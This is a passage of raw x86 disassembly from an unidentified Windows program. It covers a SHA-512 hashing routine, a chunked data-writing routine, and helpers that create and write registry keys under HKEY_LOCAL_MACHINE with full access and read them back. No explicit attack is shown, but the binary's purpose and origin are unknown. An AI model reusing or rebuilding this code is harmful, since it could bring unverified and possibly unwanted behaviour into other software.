mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_E8]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_E4]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D0]
adc edx, [esp+170h+var_CC]
add ecx, [esp+170h+var_B0]
adc edx, [esp+170h+var_AC]
mov [eax+0B0h], ecx
mov [eax+0B4h], edx
mov eax, edx
mov [esp+170h+var_B0], ecx
mov [esp+170h+var_AC], eax
mov [esp+170h+var_40], ecx
jmp short loc_4161D8
; ---------------------------------------------------------------------------
loc_4161C3: ; CODE XREF: sub_4143D0+1CF6�j
mov edx, [esp+170h+var_B0]
mov eax, [esp+170h+var_AC]
mov [esp+170h+var_40], edx
loc_4161D8: ; CODE XREF: sub_4143D0+1DF1�j
mov ecx, [esp+170h+var_154]
mov [esp+170h+var_3C], eax
mov eax, [esp+170h+var_158]
mov ebx, ecx
xor esi, esi
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
mov edx, ecx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
xor ebx, ebx
or ebx, ebp
mov ebp, [esp+170h+var_154]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
shr ebp, 0Eh
or ecx, ebp
mov ebp, [esp+170h+var_150]
xor esi, ecx
mov ecx, [esp+170h+var_154]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_14C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_144]
xor edi, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9B0[eax*8]
mov edi, [esp+170h+var_12C]
adc esi, ds:dword_41F9B4[eax*8]
add edx, [esp+170h+var_40]
mov eax, [esp+170h+var_140]
adc esi, [esp+170h+var_3C]
add eax, edx
adc ecx, esi
add [esp+170h+var_120], eax
mov esi, [esp+170h+var_130]
mov [esp+170h+var_140], eax
adc [esp+170h+var_11C], ecx
mov [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_138]
mov eax, esi
xor eax, ecx
mov [esp+170h+var_98], eax
mov eax, [esp+170h+var_134]
mov edx, edi
xor edx, eax
mov [esp+170h+var_94], edx
mov edx, esi
and edx, ecx
mov [esp+170h+var_90], edx
mov edx, edi
and edx, eax
mov [esp+170h+var_8C], edx
mov edx, ecx
xor esi, esi
shl edx, 4
mov edi, ecx
mov ebx, eax
shrd edi, ebx, 1Ch
shr ebx, 1Ch
or edx, ebx
or esi, edi
mov ebp, eax
shld ebp, ecx, 1Eh
xor ebx, ebx
shl ecx, 1Eh
or ebx, ebp
mov edi, eax
xor edx, ebx
mov ebx, [esp+170h+var_138]
shr edi, 2
or edi, ecx
mov ecx, eax
shld eax, ebx, 19h
xor esi, edi
shr ecx, 7
xor edi, edi
or edi, eax
mov eax, [esp+170h+var_98]
and eax, [esp+170h+var_128]
shl ebx, 19h
xor eax, [esp+170h+var_90]
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_94]
and ecx, [esp+170h+var_124]
xor edx, edi
xor ecx, [esp+170h+var_8C]
add esi, eax
adc edx, ecx
add [esp+170h+var_140], esi
adc [esp+170h+var_13C], edx
cmp [esp+170h+var_15C], 0
jz loc_41643F
mov eax, [esp+170h+var_A0]
mov ecx, [esp+170h+var_9C]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_9C]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_F8]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_F4]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_F8]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_F4]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D8]
adc edx, [esp+170h+var_D4]
add ecx, [esp+170h+var_C0]
adc edx, [esp+170h+var_BC]
mov [eax+0B8h], ecx
mov [eax+0BCh], edx
mov eax, edx
mov [esp+170h+var_C0], ecx
mov [esp+170h+var_BC], eax
mov [esp+170h+var_30], ecx
jmp short loc_416454
; ---------------------------------------------------------------------------
loc_41643F: ; CODE XREF: sub_4143D0+1F7E�j
mov edx, [esp+170h+var_C0]
mov eax, [esp+170h+var_BC]
mov [esp+170h+var_30], edx
loc_416454: ; CODE XREF: sub_4143D0+206D�j
mov ecx, [esp+170h+var_11C]
mov ebx, ecx
mov [esp+170h+var_2C], eax
mov eax, [esp+170h+var_120]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_11C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
shr ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_158]
xor esi, ecx
mov ecx, [esp+170h+var_11C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_154]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_14C]
not edi
and edi, [esp+170h+var_150]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9B8[eax*8]
adc esi, ds:dword_41F9BC[eax*8]
add edx, [esp+170h+var_30]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_2C]
add ecx, edx
mov edx, [esp+170h+var_144]
adc edx, esi
add eax, ecx
adc [esp+170h+var_124], edx
mov [esp+170h+var_148], ecx
mov ecx, [esp+170h+var_140]
mov [esp+170h+var_144], edx
mov edx, [esp+170h+var_13C]
mov ebx, ecx
mov ebp, edx
shrd ebx, ebp, 1Ch
xor edi, edi
or edi, ebx
mov esi, ecx
mov ebx, edx
shld edx, ecx, 1Eh
shr ebp, 1Ch
shl esi, 4
or esi, ebp
shr ebx, 2
shl ecx, 1Eh
xor ebp, ebp
or ebx, ecx
mov [esp+170h+var_128], eax
or ebp, edx
mov ecx, [esp+170h+var_13C]
xor esi, ebp
mov ebp, [esp+170h+var_140]
mov edx, ecx
shld ecx, ebp, 19h
xor edi, ebx
shr edx, 7
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_98]
and ecx, [esp+170h+var_140]
shl ebp, 19h
xor ecx, [esp+170h+var_90]
or edx, ebp
xor edi, edx
mov edx, [esp+170h+var_94]
and edx, [esp+170h+var_13C]
xor esi, ebx
xor edx, [esp+170h+var_8C]
add edi, ecx
adc esi, edx
add [esp+170h+var_148], edi
adc [esp+170h+var_144], esi
cmp [esp+170h+var_15C], 0
jz loc_4166A0
mov eax, [esp+170h+var_B0]
mov ecx, [esp+170h+var_AC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_AC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_E0]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_DC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_E0]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_DC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor edi, eax
mov eax, [esp+170h+arg_0]
xor esi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_118]
adc edx, [esp+170h+var_114]
add ecx, [esp+170h+var_A0]
adc edx, [esp+170h+var_9C]
mov [eax+0C0h], ecx
mov [eax+0C4h], edx
mov eax, edx
mov [esp+170h+var_9C], eax
mov [esp+170h+var_1C], eax
mov eax, [esp+170h+var_128]
mov [esp+170h+var_A0], ecx
mov [esp+170h+var_20], ecx
jmp short loc_4166BC
; ---------------------------------------------------------------------------
loc_4166A0: ; CODE XREF: sub_4143D0+21CE�j
mov edx, [esp+170h+var_A0]
mov ecx, [esp+170h+var_9C]
mov [esp+170h+var_20], edx
mov [esp+170h+var_1C], ecx
loc_4166BC: ; CODE XREF: sub_4143D0+22CE�j
mov ecx, [esp+170h+var_124]
mov ebx, ecx
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_124]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_120]
xor esi, ecx
mov ecx, [esp+170h+var_124]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_11C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_14C]
not ebx
and ebx, [esp+170h+var_154]
not edi
and edi, [esp+170h+var_158]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9C0[eax*8]
adc esi, ds:dword_41F9C4[eax*8]
add edx, [esp+170h+var_20]
mov eax, [esp+170h+var_150]
adc esi, [esp+170h+var_1C]
add eax, edx
adc ecx, esi
add [esp+170h+var_130], eax
mov [esp+170h+var_14C], ecx
mov [esp+170h+var_150], eax
adc [esp+170h+var_12C], ecx
mov eax, [esp+170h+var_144]
mov ecx, [esp+170h+var_148]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_148]
mov ebp, eax
shld ebp, ebx, 19h
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_13C]
xor ebp, [esp+170h+var_134]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_140]
xor edi, ecx
mov ecx, [esp+170h+var_138]
and ebp, eax
mov eax, [esp+170h+var_13C]
and eax, [esp+170h+var_134]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_150], edi
adc [esp+170h+var_14C], esi
cmp [esp+170h+var_15C], 0
jz loc_4168EA
mov eax, [esp+170h+var_C0]
mov ecx, [esp+170h+var_BC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_BC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_100]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_FC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_100]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_FC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C8]
adc edx, [esp+170h+var_C4]
add ecx, [esp+170h+var_E0]
adc edx, [esp+170h+var_DC]
mov [eax+0C8h], ecx
mov [eax+0CCh], edx
mov eax, edx
mov [esp+170h+var_E0], ecx
mov [esp+170h+var_DC], eax
mov [esp+170h+var_10], ecx
jmp short loc_4168FF
; ---------------------------------------------------------------------------
loc_4168EA: ; CODE XREF: sub_4143D0+2429�j
mov edx, [esp+170h+var_E0]
mov eax, [esp+170h+var_DC]
mov [esp+170h+var_10], edx
loc_4168FF: ; CODE XREF: sub_4143D0+2518�j
mov ecx, [esp+170h+var_12C]
mov ebx, ecx
mov [esp+170h+var_C], eax
mov eax, [esp+170h+var_130]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_12C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_128]
xor esi, ecx
mov ecx, [esp+170h+var_12C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_124]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_154]
not ebx
and ebx, [esp+170h+var_11C]
not edi
and edi, [esp+170h+var_120]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9C8[eax*8]
adc esi, ds:dword_41F9CC[eax*8]
add edx, [esp+170h+var_10]
mov eax, [esp+170h+var_158]
adc esi, [esp+170h+var_C]
add eax, edx
adc ecx, esi
add [esp+170h+var_138], eax
mov [esp+170h+var_154], ecx
mov [esp+170h+var_158], eax
adc [esp+170h+var_134], ecx
mov ecx, [esp+170h+var_150]
mov eax, [esp+170h+var_14C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_150]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
xor edx, edx
or edx, ebp
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_140]
mov ebx, ecx
and ecx, edx
xor ebx, edx
and ebx, [esp+170h+var_148]
mov ebp, eax
xor ebp, [esp+170h+var_13C]
mov edx, ecx
and ebp, [esp+170h+var_144]
mov ecx, [esp+170h+var_13C]
and eax, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_158], edi
mov edi, [esp+170h+var_15C]
adc [esp+170h+var_154], esi
add edi, 10h
cmp edi, 50h
mov [esp+170h+var_15C], edi
jb loc_414560
mov eax, [esp+170h+var_4]
mov edx, [esp+170h+var_158]
add [eax], edx
mov edx, [esp+170h+var_154]
pop edi
adc [eax+4], edx
mov eax, [esp+16Ch+arg_0]
mov edx, [esp+16Ch+var_150]
add [eax+18h], edx
mov edx, [esp+16Ch+var_14C]
pop esi
adc [eax+1Ch], edx
mov edx, [esp+168h+var_148]
add [eax+20h], edx
mov edx, [esp+168h+var_144]
pop ebp
adc [eax+24h], edx
mov edx, [esp+164h+var_140]
add [eax+28h], edx
mov edx, [esp+164h+var_134]
pop ebx
adc [eax+2Ch], ecx
mov ecx, [esp+160h+var_138]
add [eax+30h], ecx
mov ecx, [esp+160h+var_130]
adc [eax+34h], edx
add [eax+38h], ecx
mov edx, [esp+160h+var_12C]
mov ecx, [esp+160h+var_128]
adc [eax+3Ch], edx
add [eax+40h], ecx
mov edx, [esp+160h+var_124]
mov ecx, [esp+160h+var_120]
adc [eax+44h], edx
add [eax+48h], ecx
mov edx, [esp+160h+var_11C]
adc [eax+4Ch], edx
add esp, 160h
retn
sub_4143D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416AE0 proc near ; CODE XREF: J8@F_7_S:00416D62�p
; sub_41B7F9+CA�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
mov ecx, [ebx]
push ebp
and ecx, 7Fh
push esi
lea esi, [ecx+7]
shr esi, 3
push edi
mov [esp+10h+var_4], ecx
jz short loc_416B45
lea edx, [ebx+esi*8+50h]
loc_416AF9: ; CODE XREF: sub_416AE0+5F�j
mov eax, [edx-8]
mov ecx, [edx-4]
sub edx, 8
mov edi, eax
sub esi, 1
ror edi, 8
and edi, 0FF00FF00h
rol eax, 8
and eax, 0FF00FFh
or edi, eax
mov ebp, ecx
xor eax, eax
ror ebp, 8
and ebp, 0FF00FF00h
rol ecx, 8
and ecx, 0FF00FFh
or ebp, ecx
xor ecx, ecx
or eax, ebp
or edi, ecx
test esi, esi
mov [edx], eax
mov [edx+4], edi
jnz short loc_416AF9
mov ecx, [esp+10h+var_4]
loc_416B45: ; CODE XREF: sub_416AE0+13�j
mov eax, ecx
and eax, 7
add eax, eax
add eax, eax
mov esi, ds:dword_4249C0[eax+eax]
mov edi, ds:dword_4249C4[eax+eax]
add eax, eax
mov edx, ecx
shr edx, 3
and esi, [ebx+edx*8+50h]
and edi, [ebx+edx*8+54h]
or esi, ds:dword_424A00[eax]
or edi, ds:dword_424A04[eax]
cmp ecx, 6Fh
mov [ebx+edx*8+50h], esi
mov [ebx+edx*8+54h], edi
jbe short loc_416BAA
cmp ecx, 78h
jnb short loc_416B9D
mov dword ptr [ebx+0C8h], 0
mov dword ptr [ebx+0CCh], 0
loc_416B9D: ; CODE XREF: sub_416AE0+A7�j
push ebx
call sub_4143D0
add esp, 4
xor edx, edx
jmp short loc_416BB2
; ---------------------------------------------------------------------------
loc_416BAA: ; CODE XREF: sub_416AE0+A2�j
add edx, 1
cmp edx, 0Eh
jnb short loc_416BD8
loc_416BB2: ; CODE XREF: sub_416AE0+C8�j
mov ecx, 0Dh
sub ecx, edx
add ecx, ecx
add ecx, ecx
lea esi, [ebx+edx*8+50h]
add ecx, ecx
shr ecx, 2
lea edi, [esi+8]
mov dword ptr [esi], 0
mov dword ptr [esi+4], 0
rep movsd
loc_416BD8: ; CODE XREF: sub_416AE0+D0�j
mov edx, [ebx+8]
mov esi, [ebx+0Ch]
mov ecx, [ebx+4]
mov eax, [ebx]
shld esi, edx, 3
add edx, edx
mov edi, ecx
shld ecx, eax, 3
add edx, edx
add eax, eax
add edx, edx
add eax, eax
shr edi, 1Dh
xor ebp, ebp
or edx, edi
add eax, eax
or esi, ebp
push ebx
mov [ebx+0C0h], edx
mov [ebx+0C4h], esi
mov [ebx+0C8h], eax
mov [ebx+0CCh], ecx
call sub_4143D0
add esp, 4
xor esi, esi
loc_416C25: ; CODE XREF: sub_416AE0+171�j
mov ecx, esi
not ecx
and ecx, 7
mov edx, esi
shr edx, 3
mov eax, [ebx+edx*8+10h]
mov edx, [ebx+edx*8+14h]
add ecx, ecx
add ecx, ecx
add ecx, ecx
call sub_4118E0
mov ecx, [esp+10h+arg_0]
mov [esi+ecx], al
add esi, 1
cmp esi, 40h
jb short loc_416C25
pop edi
pop esi
pop ebp
pop ecx
retn
sub_416AE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C60 proc near ; CODE XREF: sub_41B7F9+A3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 0Ch
push ebx
mov ebx, [esp+10h+arg_4]
mov eax, [ebx]
push ebp
mov ebp, [esp+14h+arg_0]
push esi
push edi
and eax, 7Fh
mov edi, 80h
sub edi, eax
mov esi, ecx
xor ecx, ecx
add [ebx], ebp
adc [ebx+4], ecx
mov edx, [ebx+4]
cmp edx, ecx
ja short loc_416C9B
jb short loc_416C93
mov ecx, [ebx]
cmp ecx, ebp
jnb short loc_416C9B
loc_416C93: ; CODE XREF: sub_416C60+2B�j
add dword ptr [ebx+8], 1
adc dword ptr [ebx+0Ch], 0
loc_416C9B: ; CODE XREF: sub_416C60+29�j
; sub_416C60+31�j
cmp ebp, edi
jb loc_416D3F
loc_416CA3: ; CODE XREF: sub_416C60+D9�j
push edi
lea edx, [ebx+eax+50h]
push esi
push edx
call sub_407BF0
add esi, edi
add esp, 0Ch
sub ebp, edi
mov [esp+1Ch+var_4], esi
mov [esp+1Ch+arg_0], ebp
mov edi, 80h
mov [esp+1Ch+var_8], 0
mov esi, 10h
lea edx, [ebx+0D0h]
loc_416CD6: ; CODE XREF: sub_416C60+BC�j
mov eax, [edx-8]
mov ecx, [edx-4]
sub edx, 8
mov ebx, eax
sub esi, 1
ror ebx, 8
and ebx, 0FF00FF00h
rol eax, 8
and eax, 0FF00FFh
or ebx, eax
mov ebp, ecx
xor eax, eax
ror ebp, 8
and ebp, 0FF00FF00h
rol ecx, 8
and ecx, 0FF00FFh
or ebp, ecx
xor ecx, ecx
or eax, ebp
or ebx, ecx
test esi, esi
mov [edx], eax
mov [edx+4], ebx
jnz short loc_416CD6
mov ebx, [esp+1Ch+arg_4]
push ebx
call sub_4143D0
mov ebp, [esp+20h+arg_0]
mov eax, [esp+20h+var_8]
mov esi, [esp+20h+var_4]
add esp, 4
cmp ebp, edi
jnb loc_416CA3
loc_416D3F: ; CODE XREF: sub_416C60+3D�j
push ebp
lea edx, [eax+ebx+50h]
push esi
push edx
call sub_407BF0
add esp, 0Ch
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_416C60 endp
; ---------------------------------------------------------------------------
align 10h
push ecx
push eax
call sub_416AE0
add esp, 4
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D6C proc near ; CODE XREF: sub_416D6C+D5�p
; sub_41A9DE+67F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_416D85
mov ecx, [ebp+arg_4]
shr ecx, 18h
or cl, 1
jmp short loc_416D8B
; ---------------------------------------------------------------------------
loc_416D85: ; CODE XREF: sub_416D6C+C�j
mov cl, byte ptr [ebp+arg_4+3]
and cl, 0FEh
loc_416D8B: ; CODE XREF: sub_416D6C+17�j
movzx eax, word ptr [ebp+arg_24]
mov ebx, [ebp+arg_20]
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_416DA8
lea edx, [ebx+18h]
mov [ebp+arg_14], ebx
or cl, 2
mov [ebp+arg_2B], 0
jmp short loc_416DB9
; ---------------------------------------------------------------------------
loc_416DA8: ; CODE XREF: sub_416D6C+2B�j
mov dx, word ptr [ebp+arg_24]
add eax, 0FFFFFFE8h
mov [ebp+arg_14], eax
and cl, 0FDh
mov [ebp+arg_2B], 1
loc_416DB9: ; CODE XREF: sub_416D6C+3A�j
movzx eax, dx
push eax
mov byte ptr [ebp+arg_4+3], cl
mov [ebp+arg_C], dx
mov [ebp+var_4], eax
call sub_4036E0
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_416E58
push 6
pop ecx
mov edi, eax
lea esi, [ebp+arg_4]
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_407BF0
add esp, 0Ch
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call ds:dword_41D088
test eax, eax
jz short loc_416E4F
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_416E4F
push [ebp+arg_20]
call sub_403603
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_416E4B
push 0
push [ebp+arg_24]
sub ebx, edi
push ebx
add edi, esi
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
lea esi, [ebp+arg_4]
rep movsd
call sub_416D6C
add esp, 2Ch
jmp short loc_416E5A
; ---------------------------------------------------------------------------
loc_416E4B: ; CODE XREF: sub_416D6C+B8�j
mov al, 1
jmp short loc_416E5A
; ---------------------------------------------------------------------------
loc_416E4F: ; CODE XREF: sub_416D6C+A1�j
; sub_416D6C+A9�j
push [ebp+arg_20]
call sub_403603
pop ecx
loc_416E58: ; CODE XREF: sub_416D6C+66�j
xor al, al
loc_416E5A: ; CODE XREF: sub_416D6C+DD�j
; sub_416D6C+E1�j
pop edi
pop esi
pop ebx
leave
retn
sub_416D6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E5F proc near ; CODE XREF: sub_416F86+154�p
; sub_417119+152�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push [ebp+arg_0]
push 80000002h
call ds:dword_41D004
test eax, eax
jz short loc_416E94
push [ebp+var_4]
call ds:dword_41D010
xor al, al
loc_416E91: ; CODE XREF: sub_416E5F+68�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416E94: ; CODE XREF: sub_416E5F+25�j
mov eax, [ebp+arg_8]
push esi
lea esi, [eax+1]
loc_416E9B: ; CODE XREF: sub_416E5F+41�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_416E9B
sub eax, esi
push eax
push [ebp+arg_8]
push 1
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_41D00C
test eax, eax
pop esi
jz short loc_416EC9
loc_416EBC: ; CODE XREF: sub_416E5F+6C�j
push [ebp+var_4]
call ds:dword_41D010
mov al, bl
jmp short loc_416E91
; ---------------------------------------------------------------------------
loc_416EC9: ; CODE XREF: sub_416E5F+5B�j
mov bl, 1
jmp short loc_416EBC
sub_416E5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416ECD proc near ; CODE XREF: sub_416F86+113�p
; sub_417119+100�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 1
push 0
push [ebp+arg_4]
push 80000002h
call ds:dword_41D02C
test eax, eax
jnz short loc_416F15
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_C]
lea eax, [ebp+arg_0]
push eax
push 0
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_41D008
test eax, eax
jnz short loc_416F15
push [ebp+var_4]
call ds:dword_41D010
mov al, 1
leave
retn
; ---------------------------------------------------------------------------
loc_416F15: ; CODE XREF: sub_416ECD+1C�j
; sub_416ECD+39�j
push [ebp+var_4]
call ds:dword_41D010
push [ebp+arg_10]
push 0
push [ebp+arg_C]
call sub_407B70
add esp, 0Ch
xor al, al
leave
retn
